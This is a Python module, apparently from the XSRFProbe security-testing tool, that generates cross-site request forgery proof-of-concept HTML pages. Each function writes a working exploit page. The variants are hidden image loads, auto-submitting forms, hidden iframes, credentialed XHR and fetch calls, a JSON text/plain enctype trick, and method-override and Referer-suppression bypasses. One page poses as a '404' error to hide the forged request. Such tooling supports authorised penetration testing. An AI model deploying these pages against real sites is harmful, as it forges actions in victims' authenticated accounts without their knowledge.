#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# -:-:-:-:-:-:-::-:-:#
#    XSRF Probe     #
# -:-:-:-:-:-:-::-:-:#

# Author: 0xInfection
# This module requires XSRFProbe
# https://github.com/0xInfection/XSRFProbe

import os
import json
import logging
from html import escape as html_escape
from urllib.parse import urlencode

from xsrfprobe.files.config import OUTPUT_DIR

logger = logging.getLogger("PoCGenerator")

ATTRIBUTION = "<!-- Generated by XSRFProbe (https://github.com/0xInfection/XSRFProbe) -->"


def _esc_attr(value: str) -> str:
    """Escape a value for use inside an HTML attribute (double-quoted)."""
    return html_escape(str(value), quote=True)


def _esc_js_string(value: str, quote: str = '"') -> str:
    """Escape a value for use inside a JS string literal."""
    s = str(value)
    s = s.replace("\\", "\\\\")
    s = s.replace(quote, f"\\{quote}")
    s = s.replace("\n", "\\n")
    s = s.replace("\r", "\\r")
    s = s.replace("</", "<\\/")
    return s


def _sanitize_filename(action: str) -> str:
    if "//" in action:
        name = action.split("//", 1)[1]
    else:
        name = action
    return name.replace("/", "-").replace(":", "").replace("?", "_").strip("-")


def _hidden_inputs(params: dict) -> str:
    lines = []
    for k, v in params.items():
        lines.append(f'      <input type="hidden" name="{_esc_attr(k)}" value="{_esc_attr(v)}" />')
    return "\n".join(lines)


def _save_poc(filename: str, content: str) -> str:
    path = os.path.join(OUTPUT_DIR, filename)
    try:
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
        logger.info("PoC saved: %s", path)
    except Exception as e:
        logger.error("Failed to save PoC %s: %s", path, e)
    return path


# ----------------------------------------------------------------
# P1: GET auto-submit via <img> tag (no interaction)
# ----------------------------------------------------------------
def gen_get_img(action: str, params: dict) -> str:
    qs = urlencode(params)
    full_url = f"{action}?{qs}" if qs else action
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF GET PoC</title></head>
<body>
  <h1>404 - Page not found</h1>
  <p>The URL you are requesting is no longer available.</p>
  <img src="{_esc_attr(full_url)}" style="display:none" />
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-get-img.html", html)


# ----------------------------------------------------------------
# P2: GET link (requires click)
# ----------------------------------------------------------------
def gen_get_link(action: str, params: dict) -> str:
    qs = urlencode(params)
    full_url = f"{action}?{qs}" if qs else action
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF GET PoC</title></head>
<body>
  <a href="{_esc_attr(full_url)}">Click here to continue</a>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-get-link.html", html)


# ----------------------------------------------------------------
# P3: POST form auto-submit (no interaction)
# ----------------------------------------------------------------
def gen_post_autosubmit(action: str, params: dict) -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF POST PoC</title></head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{_esc_attr(action)}" method="POST" enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-post-auto.html", html)


# ----------------------------------------------------------------
# P4: POST form via hidden iframe (no page navigation)
# ----------------------------------------------------------------
def gen_post_iframe(action: str, params: dict) -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF POST PoC</title></head>
<body>
  <iframe style="display:none" name="csrfframe"></iframe>
  <form id="csrfform" action="{_esc_attr(action)}" method="POST" target="csrfframe"
        enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-post-iframe.html", html)


# ----------------------------------------------------------------
# P5: POST AJAX/XHR (withCredentials)
# ----------------------------------------------------------------
def gen_post_xhr(action: str, params: dict) -> str:
    body = urlencode(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF XHR PoC</title></head>
<body>
  <script>
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.open("POST", "{_esc_js_string(action)}", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.send("{_esc_js_string(body)}");
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-post-xhr.html", html)


# ----------------------------------------------------------------
# P5b: POST XHR with X-HTTP-Method-Override header (M2 bypass)
# ----------------------------------------------------------------
def gen_post_xhr_method_override(action: str, params: dict) -> str:
    body = urlencode(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF Method Override Header PoC</title></head>
<body>
  <script>
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.open("POST", "{_esc_js_string(action)}", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.setRequestHeader("X-HTTP-Method-Override", "GET");
    xhr.send("{_esc_js_string(body)}");
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-method-override-header.html", html)


# ----------------------------------------------------------------
# P6: JSON via text/plain enctype trick
# ----------------------------------------------------------------
def gen_json_textplain(action: str, params: dict) -> str:
    json_str = json.dumps(params)
    key_part = json_str[:-1]
    val_part = "}"
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF JSON PoC</title></head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{_esc_attr(action)}" method="POST" enctype="text/plain">
      <input type="hidden" name='{_esc_attr(key_part)}' value='{_esc_attr(val_part)}' />
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-json-textplain.html", html)


# ----------------------------------------------------------------
# P7: JSON via XHR (application/json, may trigger CORS preflight)
# ----------------------------------------------------------------
def gen_json_xhr(action: str, params: dict) -> str:
    payload = json.dumps(params)
    esc_action = _esc_js_string(action)
    esc_payload = _esc_js_string(payload, quote="'")
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF JSON XHR PoC</title></head>
<body>
  <script>
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.open("POST", "{esc_action}", true);
    xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
    xhr.send('{esc_payload}');
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-json-xhr.html", html)


# ----------------------------------------------------------------
# P8: Multipart POST via fetch
# ----------------------------------------------------------------
def gen_multipart_fetch(action: str, params: dict) -> str:
    lines = []
    sq = "'"
    for k, v in params.items():
        ek = _esc_js_string(k, quote=sq)
        ev = _esc_js_string(v, quote=sq)
        lines.append(f"    fd.append('{ek}', '{ev}');")
    append_lines = "\n".join(lines)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF Multipart PoC</title></head>
<body>
  <script>
    var fd = new FormData();
{append_lines}
    fetch("{_esc_js_string(action)}", {{
      method: "POST",
      body: fd,
      credentials: "include",
      mode: "no-cors"
    }});
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-multipart-fetch.html", html)


# ----------------------------------------------------------------
# P9: Method override PoC (_method hidden field)
# ----------------------------------------------------------------
def gen_method_override(action: str, params: dict, override_method: str = "POST") -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF Method Override PoC</title></head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{_esc_attr(action)}" method="GET" enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="hidden" name="_method" value="{_esc_attr(override_method)}" />
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-method-override.html", html)


# ----------------------------------------------------------------
# P10: Referer suppression PoC (wraps a POST form with <meta referrer>)
# ----------------------------------------------------------------
def gen_referer_suppressed(action: str, params: dict) -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head>
  <title>CSRF Referer Suppression PoC</title>
  <meta name="referrer" content="never" />
</head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{_esc_attr(action)}" method="POST" enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-referer-suppressed.html", html)


# ----------------------------------------------------------------
# Public API
# ----------------------------------------------------------------
class PoCGenerator:
    def __init__(self, output_dir: str = ""):
        if output_dir:
            global OUTPUT_DIR
            OUTPUT_DIR = output_dir

    def generate_all_variants(self, action: str, method: str, params: dict,
                              bypasses: set[str] | None = None,
                              enctype: str = "application/x-www-form-urlencoded") -> list[str]:
        """Generate PoC variants scoped to the form's method, enctype, and proven bypasses."""
        paths = []

        if method.upper() == "GET":
            paths.append(gen_get_img(action, params))
            paths.append(gen_get_link(action, params))
            logger.info("Generated %d PoC variant(s) for %s", len(paths), action)
            return paths

        standard_form_bypasses = {"NO_TOKEN", "T3", "T7", "T4"}
        xhr_bypasses = {"T8"}
        cookie_injection_bypasses = {"T5", "T6"}
        content_type_bypasses = {"M4"}

        if bypasses is None:
            bypasses = standard_form_bypasses

        is_multipart = (enctype == "multipart/form-data")

        if bypasses & standard_form_bypasses:
            if is_multipart:
                paths.append(gen_multipart_fetch(action, params))
            else:
                paths.append(gen_post_autosubmit(action, params))
                paths.append(gen_referer_suppressed(action, params))

        if bypasses & {"T2"}:
            paths.append(gen_get_img(action, params))

        if bypasses & {"M1"}:
            from xsrfprobe.files.discovered import ANTI_CSRF_TOKENS
            stripped_params = {k: v for k, v in params.items()
                              if not any(t.name == k for t in ANTI_CSRF_TOKENS)}
            paths.append(gen_method_override(action, stripped_params))

        if bypasses & {"M2"}:
            from xsrfprobe.files.discovered import ANTI_CSRF_TOKENS
            stripped_params = {k: v for k, v in params.items()
                              if not any(t.name == k for t in ANTI_CSRF_TOKENS)}
            paths.append(gen_post_xhr_method_override(action, stripped_params))

        if bypasses & xhr_bypasses:
            paths.append(gen_post_xhr(action, params))

        if bypasses & cookie_injection_bypasses:
            if is_multipart:
                paths.append(gen_multipart_fetch(action, params))
            else:
                paths.append(gen_post_autosubmit(action, params))

        if bypasses & content_type_bypasses:
            if not paths:
                paths.append(gen_post_autosubmit(action, params))

        if not paths:
            paths.append(gen_post_autosubmit(action, params))

        logger.info("Generated %d PoC variant(s) for %s", len(paths), action)
        return paths
